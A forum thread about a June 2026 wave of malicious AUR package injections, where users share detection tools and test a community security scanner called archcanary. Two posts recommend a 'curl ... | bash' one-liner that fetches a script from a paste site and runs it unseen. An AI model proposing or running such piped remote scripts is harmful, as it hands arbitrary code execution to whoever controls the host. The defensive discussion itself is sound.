Attack wave on AUR packages!

I got this message from Garuda forum…

Just as a heads-up, we are aware of the wave of current injections of malicious content in AUR packages.

Our security measures in chaotic-aur are working perfectly so far and have already prevented a few of them from getting deployed.

Please be extra careful when updating packages directly from AUR in the coming days! Especially watch out for the addition of an npm dependency and an additional .install script in PKGBUILDs.

Also see this post for more context:

3 Likes

How to check if infected package is installed

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
2 Likes

Thanks for this @muzqs , I was just about to suggest this one too

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

Checking for infected AUR packages (494 total)…

Clean: None of the known infected packages were installed within 48 hours of the campaign.

You can also run pacman -Qm and check manually the PKGBUILD files if you’re extra concerned about the malware attack

2 Likes

1 Like
1 Like

For your interest.

This GitHub repo was created in response to the attacks on the AUR.
Despite being new, it has already gathered 900+ stars.

GitHub - lenucksi/aur-malware-check: Detection tools for the June 2026 atomic-lockfile AUR supply-chain attack. Consolidated from community Gists. · GitHub

1 Like

Several days ago the amount of packages raised to 1500. They are using an improved method with JavaScript files in order to avoid detection too. :unamused_face:

Interesting to add to archcanary. @M0nst3r Do you know the list of JavaScript files infected?

If it is added to archlinux list, archcanary will add it to the list. Need more investication.


ARCHCANARY [beta]

I’ve been working on a security scanner for Arch-based systems and I’m looking for a few testers.

It audits your system for common security risks — things like package
integrity, config issues, and known vulnerabilities relevant to Arch. It
gives you a clear picture of where your system stands so you can decide
what to act on. Read-only, no files are touched or changed.

Still early, but functional. If you’re interested, let me know here or
check the repo. It is much to take in, so take your time.

Start with the README.md and also read docs/*.md for specific more info.

Installation: Use ./install. PKGBUILD can be behind latest commits.

If one has ideas for archcanary add an discussions on github.
Create an issues with bug report.

:penguin: work in progress…

1 Like

I found the news at Phoronix’s. To be more precise, some Node.js packages are the ones reported as you will read in one of links. :thinking:

1 Like

I’m just going to assume that this is a good report.

1 Like

Thanks for testing. Looks good indeed.

FMI: Have you installed with:

./install.sh

or

./install.sh --system

The --system install also sets up systemd services — a timer that runs background scans and a path unit that triggers automatically on pacman activity (installs, upgrades). See docs/systemd.md

I’m curious if you also have installed traur or even/also aurscan (uses LLM).

FYI AURSCAN: These are the official aurscan versions.

2 aur/aurscan-manticore-release-git 0.5.2-3 (+1 1.00) [20h38m] 
    LLM-powered pre-build malware scanner for AUR packages (with paru / yay hooks) -- git release
3 aur/aurscan-manticore-bin-release-git 0.5.2-5 (+0 0.00) [15h40m] 
    LLM-powered pre-build malware scanner for AUR packages (with paru / yay hooks) -- git release binary

The aurscan version from the fork is adapted with some fixes to work better with the GUI.

FMI: Can you show the output of.

archcanary --doctor

Example:

============================================================
 Archcanary — setup doctor
============================================================

Platform
  detected:    Mabox Linux
  AUR helpers: yay pamac
  mhwd:        present (Manjaro driver manager — expect DKMS modules)

User install
  [ OK ]  package list (config dir)

System install (root)
  [ OK ]  scanner script (/usr/lib/archcanary)
  [ OK ]  root helper (enables root checks in GUI)
  [ OK ]  polkit policy (authorizes the root helper)
  [ OK ]  DKMS allowlist

Automation (systemd)
  [ OK ]  system scan timer (weekly + boot)
  [ OK ]  post-install trigger (scan after each pacman transaction)
  [ OK ]  user scan timer (cache/autostart checks)
  [ OK ]  desktop notifier (alerts on new scan results)

Pre-install layer (external tools)
  [ OK ]  aurscan (pre-install PKGBUILD scanner)
  [ OK ]  claude CLI (aurscan LLM backend)
  [ OK ]  traur (pre-install behavioral scanner)
  [ OK ]  traur pacman hook (auto-runs on every install)
  [ OK ]  lynis (system hardening auditor)
  [ OK ]  yay hooks (auto-scan on yay install)

============================================================
 RESULT: all elements present.
============================================================

:penguin:

Thanks for the link. Working on adding it to archcanary.

^ This. I was unaware of the system wide mode. Will install it that way and do some further testing. I probably should have read the git repository before installing because the system wide option seems better. Question before I rollback to yesterday and re-install. Is it possible to do a system wide installation without torching the current user installation? Is it hurtful in anyway NOT to revert to pre-installation in other word?

^ No, I will install and test today and get back to you.

============================================================
 Archcanary — setup doctor
============================================================

Platform
  detected:    Mabox Linux
  AUR helpers: yay pamac
  mhwd:        present (Manjaro driver manager — expect DKMS modules)

Dependencies (official repos)
  [ OK ]  yad (GUI toolkit)
  [MISS]  bpftool (eBPF enumeration)
           ↳ fix: sudo pacman -S bpf
  [ OK ]  notify-send (desktop alerts)
  [ OK ]  pkexec (GUI root checks)

User install
  [ OK ]  main scanner (~/.local/bin)
  [ OK ]  GUI (~/.local/bin)
  [ OK ]  package list (config dir)

System install (root)
  [MISS]  scanner script (/usr/lib/archcanary)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  root helper (enables root checks in GUI)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  polkit policy (authorizes the root helper)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  DKMS allowlist
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system

Automation (systemd)
  [MISS]  system scan timer (weekly + boot)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  post-install trigger (scan after each pacman transaction)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [ OK ]  user scan timer (cache/autostart checks)
  [ OK ]  desktop notifier (alerts on new scan results)

Pre-install layer (external tools)
  [OPT ]  aurscan (pre-install PKGBUILD scanner)
  [OPT ]  traur (pre-install behavioral scanner)
  [OPT ]  lynis (system hardening auditor)
  [ OK ]  yay hooks (auto-scan on yay install)

NEXT STEP → bpftool (eBPF enumeration)
  run: sudo pacman -S bpf
  then re-run --doctor to advance to the next step.

============================================================
 RESULT: all elements checked — some need attention, see fixes above.
============================================================

1 Like

Good question. This should be case, but i see it is not.

Pushed it now. The .config/archcanary is kept now after uninstalling. Thanks

release v0.1.9

Major changes and fixes.

Indeed installing with --system gets the most out of it. Root is not needed for the malware and pkgbuild scanners.

git pull
./install --system

You dont need uninstall just install again.

The user installation is basicly the malware scanner. Full scan.

1 Like

Thanks for the output. It shows a bug.
Fixed.

After git pull the latest.

  • install/uninstall --system leaves the user config untouched.
1 Like

I have no clue what this means for my system.

1 Like

Hi @SauronsMouth ,

Thanks again for testing and finding a bug.

Archcanary (bpf) was producing a false positive.

Fixed

git pull
./install --system

Keep in mind I haven’t rebooted since the 21st. Maybe I should?

Also, clicking ‘About’ does nothing. ((edit) Ah HA double clicking works)

After a fresh reboot.

Apparently a reboot didn’t help.

Please avoid pictures for showing output and use copy/paste terminal output. :wink: thanks…

Can you post the output again.

Look for any pids line that isn’t systemd(1) or system something(N).
Probably a false positive.

Updated: git pull ; ./install --system

The output will now be

WARNING: lsm eBPF programs loaded by unknown process (expected systemd / AppArmor /SELinux).
Unknown loaders: firejail(1234)
If this looks like a false positive, report it at
https://github.com/musqz/archcanary/issues

Unknown loaders: should show the packages with pid.

:penguin: